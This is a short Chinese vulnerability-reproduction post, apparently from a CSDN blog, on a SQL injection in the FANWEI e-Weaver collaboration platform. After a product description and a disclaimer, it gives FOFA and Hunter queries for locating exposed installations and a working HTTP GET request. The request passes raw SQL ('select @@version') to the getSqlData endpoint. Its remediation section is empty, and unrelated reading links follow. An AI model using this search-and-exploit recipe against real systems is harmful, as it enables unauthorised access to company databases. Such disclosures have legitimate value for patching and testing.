• 【漏洞复现】泛微e-Weaver SQL注入


    漏洞描述

    泛微e-Weaver(FANWEI e-Weaver)是一款广泛应用于企业数字化转型领域的集成协同管理平台。作为中国知名的企业级软件解决方案提供商,泛微软件(广州)股份有限公司开发和推广了e-Weaver平台。
    泛微e-Weaver旨在帮助企业实现信息化管理、业务协同和数字化转型。该平台提供了一系列的功能模块,包括企业门户、流程管理、文档管理、知识管理、协同办公、人力资源管理、客户关系管理等。这些模块可以根据企业的实际需求进行定制和配置,以满足不同行业和组织的特定需求。
    在这里插入图片描述

    免责声明

    技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

    资产确定

    fofa     app="泛微-E-Weaver"
    hunter   app.name="泛微 e-Weaver"
    
    • 1
    • 2

    漏洞复现

    GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
    Host: 
    
    • 1
    • 2

    在这里插入图片描述

    修复方案

  • 相关阅读:
    【量化交易】 量化因子 风险类因子
    Requests爬虫方法
    数据治理-基本概念
    肖sir__mysql之子查询语句__006
    02Nacos和Feign及Gateway配置
    图纸管理制度 《五》
    掌握Python爬虫实现网站关键词扩展提升曝光率
    字典、哈希表、数组的概念
    列出docker常用的命令
    下载安装python的详细步骤-2023
  • 原文地址:https://blog.csdn.net/u010025272/article/details/134486197